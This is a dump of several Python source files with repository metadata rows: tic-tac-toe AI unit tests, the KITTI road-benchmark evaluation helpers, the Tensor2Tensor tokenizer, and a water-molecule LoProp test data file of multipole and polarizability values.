self.mock_presenter.computer_move_message = MagicMock()
def test_computer_chooses_moves_from_available_spots(self):
self.board.spots =[1, "X", "X", "O", "X", "O", "O", "O", "X"]
available_spots = self.board.available_spots()
chosen_move = self.computer.get_move(self.mock_presenter, self.board)
self.assertTrue(chosen_move in self.board.spots)
def test_computer_choses_first_move_optimally(self):
optimal_moves = [1, 3, 5, 7, 9]
chosen_move = self.computer.get_move(self.mock_presenter, self.board)
self.assertTrue(chosen_move in optimal_moves)
def test_computer_chooses_obvious_win(self):
self.board.spots =[1, "X", "X", "O", "X", "O", "O", "O", "X"]
chosen_move = self.computer.get_move(self.mock_presenter, self.board)
self.assertEqual(1, chosen_move)
def test_computer_chooses_winning_row_move(self):
self.board.spots = ["X", "X", 3, 4, "X", 6, 7, "O", "O"]
chosen_move = self.computer.get_move(self.mock_presenter, self.board)
self.assertEqual(7, chosen_move)
def test_computer_chooses_winning_column_move(self):
self.board.spots = ["X", 2, "O", "X", "O", 6, 7, 8, 9]
chosen_move = self.computer.get_move(self.mock_presenter, self.board)
self.assertEqual(7, chosen_move)
def test_computer_chooses_winning_diagonal_move(self):
self.board.spots = [1, 2, "X", 4, "X", "O", "O", "O", "X"]
chosen_move = self.computer.get_move(self.mock_presenter, self.board)
self.assertEqual(1, chosen_move)
def test_computer_takes_win_over_block(self):
self.board.spots = ["X", "X", 3, 4, "X", 6, "O", "O", 9]
chosen_move = self.computer.get_move(self.mock_presenter, self.board)
self.assertEqual(9, chosen_move)
def test_computer_takes_win_over_fork(self):
self.board.spots = ["X", 2, "X", "O", "O", 6, "X", 8, 9]
chosen_move = self.computer.get_move(self.mock_presenter, self.board)
self.assertEqual(6, chosen_move)
class ScoreMoveTests(unittest.TestCase):
def setUp(self):
self.computer = Computer("X")
self.board = Board()
self.winning_spots = ["X", "X", 3, 4, "X", 6, "O", "O", "O"]
def test_stalemates_are_scored_as_zero(self):
stalemated_board = ["X", "O", "O", "O", "X", "X", "X", "X", "O"]
self.board.spots = stalemated_board
score = self.computer.score_move(self.board, "X", 1)
self.assertEqual(score, 0)
    def test_wins_are_scored_as_one(self):
self.board.spots = self.winning_spots
score = self.computer.score_move(self.board, "X", 1)
self.assertEqual(score, -1)
    def test_lower_depths_receive_higher_scores(self):
self.board.spots = self.winning_spots
low_depth_score = -(self.computer.score_move(self.board, "X", 1))
high_depth_score = -(self.computer.score_move(self.board, "X", 2))
self.assertTrue(low_depth_score > high_depth_score)
| mit | -2,769,153,688,733,761,000 | 36.701923 | 77 | 0.616424 | false |
mrtukkin/svm-street-detector | devkit_kitti/helper.py | 1 | 12022 | #!/usr/bin/env python
#
# THE KITTI VISION BENCHMARK SUITE: ROAD BENCHMARK
#
# Copyright (C) 2013
# Honda Research Institute Europe GmbH
# Carl-Legien-Str. 30
# 63073 Offenbach/Main
# Germany
#
# UNPUBLISHED PROPRIETARY MATERIAL.
# ALL RIGHTS RESERVED.
#
# Authors: Tobias Kuehnl <[email protected]>
# Jannik Fritsch <[email protected]>
#
import numpy as np
import pylab
import os
import cv2
def getGroundTruth(fileNameGT):
'''
Returns the ground truth maps for roadArea and the validArea
:param fileNameGT:
'''
# Read GT
assert os.path.isfile(fileNameGT), 'Cannot find: %s' % fileNameGT
full_gt = cv2.imread(fileNameGT, cv2.CV_LOAD_IMAGE_UNCHANGED)
#attention: OpenCV reads in as BGR, so first channel has Blue / road GT
roadArea = full_gt[:,:,0] > 0
validArea = full_gt[:,:,2] > 0
return roadArea, validArea
def overlayImageWithConfidence(in_image, conf, vis_channel = 1, threshold = 0.5):
'''
:param in_image:
:param conf:
:param vis_channel:
:param threshold:
'''
if in_image.dtype == 'uint8':
visImage = in_image.copy().astype('f4')/255
else:
visImage = in_image.copy()
channelPart = visImage[:, :, vis_channel] * (conf > threshold) - conf
channelPart[channelPart < 0] = 0
visImage[:, :, vis_channel] = visImage[:, :, vis_channel] * (conf <= threshold) + (conf > threshold) * conf + channelPart
return visImage
def evalExp(gtBin, cur_prob, thres, validMap = None, validArea=None):
'''
Does the basic pixel based evaluation!
:param gtBin:
:param cur_prob:
:param thres:
:param validMap:
'''
assert len(cur_prob.shape) == 2, 'Wrong size of input prob map'
assert len(gtBin.shape) == 2, 'Wrong size of input prob map'
thresInf = np.concatenate(([-np.Inf], thres, [np.Inf]))
#Merge validMap with validArea
if validMap!=None:
if validArea!=None:
validMap = (validMap == True) & (validArea == True)
elif validArea!=None:
validMap=validArea
# histogram of false negatives
if validMap!=None:
fnArray = cur_prob[(gtBin == True) & (validMap == True)]
else:
fnArray = cur_prob[(gtBin == True)]
fnHist = np.histogram(fnArray,bins=thresInf)[0]
fnCum = np.cumsum(fnHist)
FN = fnCum[0:0+len(thres)];
if validMap!=None:
fpArray = cur_prob[(gtBin == False) & (validMap == True)]
else:
fpArray = cur_prob[(gtBin == False)]
fpHist = np.histogram(fpArray, bins=thresInf)[0]
fpCum = np.flipud(np.cumsum(np.flipud(fpHist)))
FP = fpCum[1:1+len(thres)]
# count labels and protos
#posNum = fnArray.shape[0]
#negNum = fpArray.shape[0]
if validMap!=None:
posNum = np.sum((gtBin == True) & (validMap == True))
negNum = np.sum((gtBin == False) & (validMap == True))
else:
posNum = np.sum(gtBin == True)
negNum = np.sum(gtBin == False)
return FN, FP, posNum, negNum
def pxEval_maximizeFMeasure(totalPosNum, totalNegNum, totalFN, totalFP, thresh = None):
'''
@param totalPosNum: scalar
@param totalNegNum: scalar
@param totalFN: vector
@param totalFP: vector
@param thresh: vector
'''
#Calc missing stuff
totalTP = totalPosNum - totalFN
totalTN = totalNegNum - totalFP
valid = (totalTP>=0) & (totalTN>=0)
assert valid.all(), 'Detected invalid elements in eval'
recall = totalTP / float( totalPosNum )
precision = totalTP / (totalTP + totalFP + 1e-10)
selector_invalid = (recall==0) & (precision==0)
recall = recall[~selector_invalid]
precision = precision[~selector_invalid]
maxValidIndex = len(precision)
#Pascal VOC average precision
AvgPrec = 0
counter = 0
for i in np.arange(0,1.1,0.1):
ind = np.where(recall>=i)
if ind == None:
continue
pmax = max(precision[ind])
AvgPrec += pmax
counter += 1
AvgPrec = AvgPrec/counter
# F-measure operation point
beta = 1.0
betasq = beta**2
F = (1 + betasq) * (precision * recall)/((betasq * precision) + recall + 1e-10)
index = F.argmax()
MaxF= F[index]
recall_bst = recall[index]
precision_bst = precision[index]
TP = totalTP[index]
TN = totalTN[index]
FP = totalFP[index]
FN = totalFN[index]
valuesMaxF = np.zeros((1,4),'u4')
valuesMaxF[0,0] = TP
valuesMaxF[0,1] = TN
valuesMaxF[0,2] = FP
valuesMaxF[0,3] = FN
#ACC = (totalTP+ totalTN)/(totalPosNum+totalNegNum)
prob_eval_scores = calcEvalMeasures(valuesMaxF)
prob_eval_scores['AvgPrec'] = AvgPrec
prob_eval_scores['MaxF'] = MaxF
#prob_eval_scores['totalFN'] = totalFN
#prob_eval_scores['totalFP'] = totalFP
prob_eval_scores['totalPosNum'] = totalPosNum
prob_eval_scores['totalNegNum'] = totalNegNum
prob_eval_scores['precision'] = precision
prob_eval_scores['recall'] = recall
#prob_eval_scores['precision_bst'] = precision_bst
#prob_eval_scores['recall_bst'] = recall_bst
prob_eval_scores['thresh'] = thresh
if thresh != None:
BestThresh= thresh[index]
prob_eval_scores['BestThresh'] = BestThresh
#return a dict
return prob_eval_scores
def calcEvalMeasures(evalDict, tag = '_wp'):
'''
:param evalDict:
:param tag:
'''
# array mode!
TP = evalDict[:,0].astype('f4')
TN = evalDict[:,1].astype('f4')
FP = evalDict[:,2].astype('f4')
FN = evalDict[:,3].astype('f4')
Q = TP / (TP + FP + FN)
P = TP + FN
N = TN + FP
TPR = TP / P
FPR = FP / N
FNR = FN / P
TNR = TN / N
A = (TP + TN) / (P + N)
precision = TP / (TP + FP)
recall = TP / P
#numSamples = TP + TN + FP + FN
correct_rate = A
# F-measure
#beta = 1.0
#betasq = beta**2
#F_max = (1 + betasq) * (precision * recall)/((betasq * precision) + recall + 1e-10)
outDict =dict()
outDict['TP'+ tag] = TP
outDict['FP'+ tag] = FP
outDict['FN'+ tag] = FN
outDict['TN'+ tag] = TN
outDict['Q'+ tag] = Q
outDict['A'+ tag] = A
outDict['TPR'+ tag] = TPR
outDict['FPR'+ tag] = FPR
outDict['FNR'+ tag] = FNR
outDict['PRE'+ tag] = precision
outDict['REC'+ tag] = recall
outDict['correct_rate'+ tag] = correct_rate
return outDict
def setFigLinesBW(fig):
"""
Take each axes in the figure, and for each line in the axes, make the
line viewable in black and white.
"""
for ax in fig.get_axes():
setAxLinesBW(ax)
def setAxLinesBW(ax):
"""
Take each Line2D in the axes, ax, and convert the line style to be
suitable for black and white viewing.
"""
MARKERSIZE = 3
# COLORMAP = {
# 'r': {'marker': None, 'dash': (None,None)},
# 'g': {'marker': None, 'dash': [5,2]},
# 'm': {'marker': None, 'dash': [11,3]},
# 'b': {'marker': None, 'dash': [6,3,2,3]},
# 'c': {'marker': None, 'dash': [1,3]},
# 'y': {'marker': None, 'dash': [5,3,1,2,1,10]},
# 'k': {'marker': 'o', 'dash': (None,None)} #[1,2,1,10]}
# }
COLORMAP = {
'r': {'marker': "None", 'dash': ("None","None")},
'g': {'marker': "None", 'dash': [5,2]},
'm': {'marker': "None", 'dash': [11,3]},
'b': {'marker': "None", 'dash': [6,3,2,3]},
'c': {'marker': "None", 'dash': [1,3]},
'y': {'marker': "None", 'dash': [5,3,1,2,1,10]},
'k': {'marker': 'o', 'dash': ("None","None")} #[1,2,1,10]}
}
for line in ax.get_lines():
origColor = line.get_color()
#line.set_color('black')
line.set_dashes(COLORMAP[origColor]['dash'])
line.set_marker(COLORMAP[origColor]['marker'])
line.set_markersize(MARKERSIZE)
def plotPrecisionRecall(precision, recall, outFileName, Fig=None, drawCol=1, textLabel = None, title = None, fontsize1 = 24, fontsize2 = 20, linewidth = 3):
'''
:param precision:
:param recall:
:param outFileName:
:param Fig:
:param drawCol:
:param textLabel:
:param fontsize1:
:param fontsize2:
:param linewidth:
'''
clearFig = False
if Fig == None:
Fig = pylab.figure()
clearFig = True
#tableString = 'Algo avgprec Fmax prec recall accuracy fpr Q(TonITS)\n'
linecol = ['g','m','b','c']
#if we are evaluating SP, then BL is available
#sectionName = 'Evaluation_'+tag+'PxProb'
#fullEvalFile = os.path.join(eval_dir,evalName)
#Precision,Recall,evalString = readEvaluation(fullEvalFile,sectionName,AlgoLabel)
pylab.plot(100*recall, 100*precision, linewidth=linewidth, color=linecol[drawCol], label=textLabel)
#writing out PrecRecall curves as graphic
setFigLinesBW(Fig)
if textLabel!= None:
pylab.legend(loc='lower left',prop={'size':fontsize2})
if title!= None:
pylab.title(title, fontsize=fontsize1)
#pylab.title(title,fontsize=24)
pylab.ylabel('PRECISION [%]',fontsize=fontsize1)
pylab.xlabel('RECALL [%]',fontsize=fontsize1)
pylab.xlim(0,100)
pylab.xticks( [0, 10, 20, 30, 40, 50, 60, 70, 80, 90, 100],
('0','','20','','40','','60','','80','','100'), fontsize=fontsize2 )
pylab.ylim(0,100)
pylab.yticks( [0, 10, 20, 30, 40, 50, 60, 70, 80, 90, 100],
('0','','20','','40','','60','','80','','100'), fontsize=fontsize2 )
pylab.grid(True)
#
if type(outFileName) != list:
pylab.savefig( outFileName )
else:
for outFn in outFileName:
pylab.savefig( outFn )
if clearFig:
pylab.close()
Fig.clear()
def saveBEVImageWithAxes(data, outputname, cmap = None, xlabel = 'x [m]', ylabel = 'z [m]', rangeX = [-10, 10], rangeXpx = None, numDeltaX = 5, rangeZ = [7, 62], rangeZpx = None, numDeltaZ = 5, fontSize = 16):
'''
:param data:
:param outputname:
:param cmap:
'''
aspect_ratio = float(data.shape[1])/data.shape[0]
fig = pylab.figure()
Scale = 8
# add +1 to get axis text
fig.set_size_inches(Scale*aspect_ratio+1,Scale*1)
ax = pylab.gca()
#ax.set_axis_off()
#fig.add_axes(ax)
if cmap != None:
pylab.set_cmap(cmap)
#ax.imshow(data, interpolation='nearest', aspect = 'normal')
ax.imshow(data, interpolation='nearest')
if rangeXpx == None:
rangeXpx = (0, data.shape[1])
if rangeZpx == None:
rangeZpx = (0, data.shape[0])
modBev_plot(ax, rangeX, rangeXpx, numDeltaX, rangeZ, rangeZpx, numDeltaZ, fontSize, xlabel = xlabel, ylabel = ylabel)
#plt.savefig(outputname, bbox_inches='tight', dpi = dpi)
pylab.savefig(outputname, dpi = data.shape[0]/Scale)
pylab.close()
fig.clear()
def modBev_plot(ax, rangeX = [-10, 10 ], rangeXpx= [0, 400], numDeltaX = 5, rangeZ= [8,48 ], rangeZpx= [0, 800], numDeltaZ = 9, fontSize = None, xlabel = 'x [m]', ylabel = 'z [m]'):
'''
@param ax:
'''
    #TODO: Configurability would be nice!
if fontSize==None:
fontSize = 8
ax.set_xlabel(xlabel, fontsize=fontSize)
ax.set_ylabel(ylabel, fontsize=fontSize)
zTicksLabels_val = np.linspace(rangeZpx[0], rangeZpx[1], numDeltaZ)
ax.set_yticks(zTicksLabels_val)
#ax.set_yticks([0, 100, 200, 300, 400, 500, 600, 700, 800])
xTicksLabels_val = np.linspace(rangeXpx[0], rangeXpx[1], numDeltaX)
ax.set_xticks(xTicksLabels_val)
xTicksLabels_val = np.linspace(rangeX[0], rangeX[1], numDeltaX)
zTicksLabels = map(lambda x: str(int(x)), xTicksLabels_val)
ax.set_xticklabels(zTicksLabels,fontsize=fontSize)
zTicksLabels_val = np.linspace(rangeZ[1],rangeZ[0], numDeltaZ)
zTicksLabels = map(lambda x: str(int(x)), zTicksLabels_val)
ax.set_yticklabels(zTicksLabels,fontsize=fontSize)
| gpl-3.0 | 2,271,872,404,286,744,000 | 29.437975 | 209 | 0.58551 | false |
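An illustrative end-to-end call of the evaluation helpers above on a tiny synthetic example (all numbers are made up, and the import path may differ from the actual devkit layout):
import numpy as np
from helper import evalExp, pxEval_maximizeFMeasure  # module above; adjust path as needed
gt = np.array([[True, False], [True, False]])   # synthetic ground-truth road mask
prob = np.array([[0.9, 0.2], [0.4, 0.1]])       # synthetic probability map
thresh = np.array([0.25, 0.5, 0.75])
FN, FP, posNum, negNum = evalExp(gt, prob, thresh)
scores = pxEval_maximizeFMeasure(posNum, negNum, FN, FP, thresh=thresh)
# scores holds 'MaxF', 'AvgPrec', 'BestThresh', 'PRE_wp', 'REC_wp', ... as built above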
mlperf/training_results_v0.6 | Google/benchmarks/transformer/implementations/tpu-v3-256-transformer/dataset_preproc/data_generators/tokenizer.py | 7 | 6150 | # coding=utf-8
# Copyright 2018 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A simple invertible tokenizer.
Converts from a unicode string to a list of tokens
(represented as Unicode strings).
This tokenizer has the following desirable properties:
- It is invertible.
- Alphanumeric characters are broken away from non-alphanumeric characters.
- A single space between words does not produce an extra token.
- The full Unicode punctuation and separator set is recognized.
The tokenization algorithm is as follows:
1. Split the text into a list of tokens, splitting at every boundary of an
alphanumeric character and a non-alphanumeric character. This produces
a list which alternates between "alphanumeric tokens"
(strings of alphanumeric characters) and "non-alphanumeric tokens"
(strings of non-alphanumeric characters).
2. Remove every token consisting of a single space, unless it is
the very first or very last token in the list. These tokens are now
implied by the fact that there are two adjacent alphanumeric tokens.
e.g. u"Dude - that's so cool."
-> [u"Dude", u" - ", u"that", u"'", u"s", u"so", u"cool", u"."]
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import sys
import unicodedata
import six
from six.moves import range # pylint: disable=redefined-builtin
import tensorflow as tf
# Conversion between Unicode and UTF-8, if required (on Python2)
_native_to_unicode = (lambda s: s.decode("utf-8")) if six.PY2 else (lambda s: s)
# This set contains all letter and number characters.
_ALPHANUMERIC_CHAR_SET = set(
six.unichr(i) for i in range(sys.maxunicode)
if (unicodedata.category(six.unichr(i)).startswith("L") or
unicodedata.category(six.unichr(i)).startswith("N")))
def encode(text):
"""Encode a unicode string as a list of tokens.
Args:
text: a unicode string
Returns:
a list of tokens as Unicode strings
"""
if not text:
return []
ret = []
token_start = 0
# Classify each character in the input string
is_alnum = [c in _ALPHANUMERIC_CHAR_SET for c in text]
for pos in range(1, len(text)):
if is_alnum[pos] != is_alnum[pos - 1]:
token = text[token_start:pos]
if token != u" " or token_start == 0:
ret.append(token)
token_start = pos
final_token = text[token_start:]
ret.append(final_token)
return ret
def decode(tokens):
"""Decode a list of tokens to a unicode string.
Args:
tokens: a list of Unicode strings
Returns:
a unicode string
"""
token_is_alnum = [t[0] in _ALPHANUMERIC_CHAR_SET for t in tokens]
ret = []
for i, token in enumerate(tokens):
if i > 0 and token_is_alnum[i - 1] and token_is_alnum[i]:
ret.append(u" ")
ret.append(token)
return "".join(ret)
def _read_filepattern(filepattern, max_lines=None, split_on_newlines=True):
"""Reads files matching a wildcard pattern, yielding the contents.
Args:
filepattern: A wildcard pattern matching one or more files.
max_lines: If set, stop reading after reading this many lines.
split_on_newlines: A boolean. If true, then split files by lines and strip
leading and trailing whitespace from each line. Otherwise, treat each
file as a single string.
Yields:
The contents of the files as lines, if split_on_newlines is True, or
the entire contents of each file if False.
"""
filenames = sorted(tf.gfile.Glob(filepattern))
lines_read = 0
for filename in filenames:
with tf.gfile.Open(filename) as f:
if split_on_newlines:
for line in f:
yield line.strip()
lines_read += 1
if max_lines and lines_read >= max_lines:
return
else:
if max_lines:
doc = []
for line in f:
doc.append(line)
lines_read += 1
if max_lines and lines_read >= max_lines:
yield "".join(doc)
return
yield "".join(doc)
else:
yield f.read()
def corpus_token_counts(
text_filepattern, corpus_max_lines, split_on_newlines=True):
"""Read the corpus and compute a dictionary of token counts.
Args:
text_filepattern: A pattern matching one or more files.
corpus_max_lines: An integer; maximum total lines to read.
split_on_newlines: A boolean. If true, then split files by lines and strip
leading and trailing whitespace from each line. Otherwise, treat each
file as a single string.
Returns:
a dictionary mapping token to count.
"""
counts = collections.Counter()
for doc in _read_filepattern(
text_filepattern,
max_lines=corpus_max_lines,
split_on_newlines=split_on_newlines):
counts.update(encode(_native_to_unicode(doc)))
return counts
def vocab_token_counts(text_filepattern, max_lines):
"""Read a vocab file and return a dictionary of token counts.
Reads a two-column CSV file of tokens and their frequency in a dataset. The
tokens are presumed to be generated by encode() or the equivalent.
Args:
text_filepattern: A pattern matching one or more files.
max_lines: An integer; maximum total lines to read.
Returns:
a dictionary mapping token to count.
"""
ret = {}
for i, line in enumerate(
_read_filepattern(text_filepattern, max_lines=max_lines)):
if "," not in line:
tf.logging.warning("Malformed vocab line #%d '%s'", i, line)
continue
token, count = line.rsplit(",", 1)
ret[_native_to_unicode(token)] = int(count)
return ret
| apache-2.0 | 5,644,124,542,219,106,000 | 30.865285 | 80 | 0.68374 | false |
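A round-trip sketch of encode()/decode() using the example already given in the module docstring (the import path is assumed):
from tensor2tensor.data_generators import tokenizer  # import path assumed
toks = tokenizer.encode(u"Dude - that's so cool.")
# toks == [u"Dude", u" - ", u"that", u"'", u"s", u"so", u"cool", u"."]
assert tokenizer.decode(toks) == u"Dude - that's so cool."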
fishstamp82/loprop | test/h2o_data.py | 2 | 11431 | from ..daltools.util.full import init
Z = [8., 1., 1.]
Rc = init([0.00000000, 0.00000000, 0.48860959])
Dtot = [0, 0, -0.76539388]
Daa = init([
[ 0.00000000, 0.00000000, -0.28357300],
[ 0.15342658, 0.00000000, 0.12734703],
[-0.15342658, 0.00000000, 0.12734703],
])
QUc = init([-7.31176220, 0., 0., -5.43243232, 0., -6.36258665])
QUN = init([4.38968295, 0., 0., 0., 0., 1.75400326])
QUaa = init([
[-3.29253618, 0.00000000, 0.00000000, -4.54316657, 0.00000000, -4.00465380],
[-0.13213704, 0.00000000, 0.24980518, -0.44463288, 0.00000000, -0.26059139],
[-0.13213704, 0.00000000,-0.24980518, -0.44463288, 0.00000000, -0.26059139]
])
Fab = init([
[-0.11E-03, 0.55E-04, 0.55E-04],
[ 0.55E-04, -0.55E-04, 0.16E-30],
[ 0.55E-04, 0.16E-30, -0.55E-04]
])
Lab = init([
[0.11E-03, 0.28E-03, 0.28E-03],
[0.28E-03, 0.17E-03, 0.22E-03],
[0.28E-03, 0.22E-03, 0.17E-03]
])
la = init([
[0.0392366,-27.2474016 , 27.2081650],
[0.0358964, 27.2214515 ,-27.2573479],
[0.01211180, -0.04775576, 0.03564396],
[0.01210615, -0.00594030, -0.00616584],
[10.69975088, -5.34987556, -5.34987532],
[-10.6565582, 5.3282791 , 5.3282791]
])
O = [
0.76145382,
-0.00001648, 1.75278523,
-0.00007538, 0.00035773, 1.39756345
]
H1O = [
3.11619527,
0.00019911, 1.25132346,
2.11363325, 0.00111442, 2.12790474
]
H1 = [
0.57935224,
0.00018083, 0.43312326,
0.11495546, 0.00004222, 0.45770123
]
H2O = [
3.11568759,
0.00019821, 1.25132443,
-2.11327482, -0.00142746, 2.12790473
]
H2H1 = [
0.04078206,
-0.00008380, -0.01712262,
-0.00000098, 0.00000084, -0.00200285
]
H2 = [
0.57930522,
0.00018221, 0.43312149,
-0.11493635, -0.00016407, 0.45770123
]
Aab = init([O, H1O, H1, H2O, H2H1, H2])
Aa = init([
[ 3.87739525, 0.00018217, 3.00410918, 0.00010384, 0.00020122, 3.52546819 ],
[ 2.15784091, 0.00023848, 1.05022368, 1.17177159, 0.00059985, 1.52065218 ],
[ 2.15754005, 0.00023941, 1.05022240, -1.17157425, -0.00087738, 1.52065217 ]
])
ff = 0.001
rMP = init([
#O
[
[-8.70343886, 0.00000000, 0.00000000, -0.39827574, -3.68114747, 0.00000000, 0.00000000, -4.58632761, 0.00000000, -4.24741556],
[-8.70343235, 0.00076124, 0.00000000, -0.39827535, -3.68114147, 0.00000000, 0.00193493, -4.58631888, 0.00000000, -4.24741290],
[-8.70343291,-0.00076166, 0.00000000, -0.39827505, -3.68114128, 0.00000000, -0.00193603, -4.58631789, 0.00000000, -4.24741229],
[-8.70343685,-0.00000006, 0.00175241, -0.39827457, -3.68114516, 0.00000000, 0.00000161, -4.58632717, 0.00053363, -4.24741642],
[-8.70343685, 0.00000000, -0.00175316, -0.39827456, -3.68114514, 0.00000000, 0.00000000, -4.58632711, -0.00053592, -4.24741639],
[-8.70166502, 0.00000000, 0.00000144, -0.39688042, -3.67884999, 0.00000000, 0.00000000, -4.58395384, 0.00000080, -4.24349307],
[-8.70520554, 0.00000000, 0.00000000, -0.39967554, -3.68344246, 0.00000000, 0.00000000, -4.58868836, 0.00000000, -4.25134640],
],
#H1O
[
[ 0.00000000, 0.10023328, 0.00000000, 0.11470275, 0.53710687, 0.00000000, 0.43066796, 0.04316104, 0.00000000, 0.36285790],
[ 0.00150789, 0.10111974, 0.00000000, 0.11541803, 0.53753360, 0.00000000, 0.43120945, 0.04333774, 0.00000000, 0.36314215],
[-0.00150230, 0.09934695, 0.00000000, 0.11398581, 0.53667861, 0.00000000, 0.43012612, 0.04298361, 0.00000000, 0.36257249],
[ 0.00000331, 0.10023328, 0.00125017, 0.11470067, 0.53710812, -0.00006107, 0.43066944, 0.04316020, 0.00015952, 0.36285848],
[ 0.00000100, 0.10023249, -0.00125247, 0.11470042, 0.53710716, 0.00006135, 0.43066837, 0.04316018, -0.00015966, 0.36285788],
[ 0.00088692, 0.10059268, -0.00000064, 0.11590322, 0.53754715, -0.00000006, 0.43071206, 0.04334198, -0.00000015, 0.36330053],
[-0.00088334, 0.09987383, 0.00000000, 0.11350091, 0.53666602, 0.00000000, 0.43062352, 0.04297910, 0.00000000, 0.36241326],
],
#H1
[
[-0.64828057, 0.10330994, 0.00000000, 0.07188960, -0.47568174, 0.00000000, -0.03144252, -0.46920879, 0.00000000, -0.50818752],
[-0.64978846, 0.10389186, 0.00000000, 0.07204462, -0.47729337, 0.00000000, -0.03154159, -0.47074619, 0.00000000, -0.50963693],
[-0.64677827, 0.10273316, 0.00000000, 0.07173584, -0.47408263, 0.00000000, -0.03134407, -0.46768337, 0.00000000, -0.50674873],
[-0.64828388, 0.10331167, 0.00043314, 0.07189029, -0.47568875, -0.00023642, -0.03144270, -0.46921635, -0.00021728, -0.50819386],
[-0.64828157, 0.10331095, -0.00043311, 0.07188988, -0.47568608, 0.00023641, -0.03144256, -0.46921346, 0.00021729, -0.50819095],
[-0.64916749, 0.10338629, -0.00000024, 0.07234862, -0.47634698, 0.00000013, -0.03159569, -0.47003679, 0.00000011, -0.50936853],
[-0.64739723, 0.10323524, 0.00000000, 0.07143322, -0.47502412, 0.00000000, -0.03129003, -0.46838912, 0.00000000, -0.50701656],
],
#H2O
[
[ 0.00000000,-0.10023328, 0.00000000, 0.11470275, 0.53710687, 0.00000000, -0.43066796, 0.04316104, 0.00000000, 0.36285790],
[-0.00150139,-0.09934749, 0.00000000, 0.11398482, 0.53667874, 0.00000000, -0.43012670, 0.04298387, 0.00000000, 0.36257240],
[ 0.00150826,-0.10112008, 0.00000000, 0.11541676, 0.53753350, 0.00000000, -0.43120982, 0.04333795, 0.00000000, 0.36314186],
[-0.00000130,-0.10023170, 0.00125018, 0.11470018, 0.53710620, 0.00006107, -0.43066732, 0.04316017, 0.00015952, 0.36285728],
[ 0.00000101,-0.10023249, -0.00125247, 0.11470042, 0.53710716, -0.00006135, -0.43066838, 0.04316018, -0.00015966, 0.36285788],
[ 0.00088692,-0.10059268, -0.00000064, 0.11590322, 0.53754715, 0.00000006, -0.43071206, 0.04334198, -0.00000015, 0.36330053],
[-0.00088334,-0.09987383, 0.00000000, 0.11350091, 0.53666602, 0.00000000, -0.43062352, 0.04297910, 0.00000000, 0.36241326],
],
#H2H1
[
[ 0.00000000, 0.00000000, 0.00000000, -0.00378789, 0.00148694, 0.00000000, 0.00000000, 0.00599079, 0.00000000, 0.01223822],
[ 0.00000000, 0.00004089, 0.00000000, -0.00378786, 0.00148338, 0.00000000, -0.00004858, 0.00599281, 0.00000000, 0.01224094],
[ 0.00000000,-0.00004067, 0.00000000, -0.00378785, 0.00148341, 0.00000000, 0.00004861, 0.00599277, 0.00000000, 0.01224093],
[ 0.00000000,-0.00000033, -0.00001707, -0.00378763, 0.00149017, 0.00000000, 0.00000001, 0.00599114, -0.00001229, 0.01223979],
[ 0.00000000, 0.00000000, 0.00001717, -0.00378763, 0.00149019, 0.00000000, 0.00000000, 0.00599114, 0.00001242, 0.01223980],
[ 0.00000000, 0.00000000, 0.00000000, -0.00378978, 0.00141897, 0.00000000, 0.00000000, 0.00590445, 0.00000002, 0.01210376],
[ 0.00000000, 0.00000000, 0.00000000, -0.00378577, 0.00155694, 0.00000000, 0.00000000, 0.00607799, 0.00000000, 0.01237393],
],
#H2
[
[-0.64828057,-0.10330994, 0.00000000, 0.07188960, -0.47568174, 0.00000000, 0.03144252, -0.46920879, 0.00000000, -0.50818752],
[-0.64677918,-0.10273369, 0.00000000, 0.07173576, -0.47408411, 0.00000000, 0.03134408, -0.46768486, 0.00000000, -0.50674986],
[-0.64978883,-0.10389230, 0.00000000, 0.07204446, -0.47729439, 0.00000000, 0.03154159, -0.47074717, 0.00000000, -0.50963754],
[-0.64827927,-0.10331022, 0.00043313, 0.07188947, -0.47568340, 0.00023642, 0.03144242, -0.46921057, -0.00021727, -0.50818804],
[-0.64828158,-0.10331095, -0.00043311, 0.07188988, -0.47568609, -0.00023641, 0.03144256, -0.46921348, 0.00021729, -0.50819097],
[-0.64916749,-0.10338629, -0.00000024, 0.07234862, -0.47634698, -0.00000013, 0.03159569, -0.47003679, 0.00000011, -0.50936853],
[-0.64739723,-0.10323524, 0.00000000, 0.07143322, -0.47502412, 0.00000000, 0.03129003, -0.46838912, 0.00000000, -0.50701656]
]
])
Am = init([
[8.186766009140, 0., 0.],
[0., 5.102747935447, 0.],
[0., 0., 6.565131856389]
])
Amw = init([
[11.98694996213, 0., 0.],
[0., 4.403583657738, 0.],
[0., 0., 2.835142058626]
])
R = [
[ 0.00000, 0.00000, 0.69801],
[-1.48150, 0.00000, -0.34901],
[ 1.48150, 0.00000, -0.34901]
]
Qtot = -10.0
Q = rMP[0, 0, (0, 2, 5)]
D = rMP[1:4, 0, :]
QU = rMP[4:, 0, :]
dQa = rMP[0, :, (0,2,5)]
dQab = rMP[0, :, (1, 3, 4)]
#These are string data for testing potential file
PAn0 = """AU
3 -1 0 1
1 0.000 0.000 0.698
1 -1.481 0.000 -0.349
1 1.481 0.000 -0.349
"""
PA00 = """AU
3 0 0 1
1 0.000 0.000 0.698 -0.703
1 -1.481 0.000 -0.349 0.352
1 1.481 0.000 -0.349 0.352
"""
PA10 = """AU
3 1 0 1
1 0.000 0.000 0.698 -0.703 -0.000 0.000 -0.284
1 -1.481 0.000 -0.349 0.352 0.153 0.000 0.127
1 1.481 0.000 -0.349 0.352 -0.153 0.000 0.127
"""
PA20 = """AU
3 2 0 1
1 0.000 0.000 0.698 -0.703 -0.000 0.000 -0.284 -3.293 0.000 -0.000 -4.543 -0.000 -4.005
1 -1.481 0.000 -0.349 0.352 0.153 0.000 0.127 -0.132 0.000 0.250 -0.445 0.000 -0.261
1 1.481 0.000 -0.349 0.352 -0.153 0.000 0.127 -0.132 -0.000 -0.250 -0.445 0.000 -0.261
"""
PA21 = """AU
3 2 1 1
1 0.000 0.000 0.698 -0.703 -0.000 0.000 -0.284 -3.293 0.000 -0.000 -4.543 -0.000 -4.005 3.466
1 -1.481 0.000 -0.349 0.352 0.153 0.000 0.127 -0.132 0.000 0.250 -0.445 0.000 -0.261 1.576
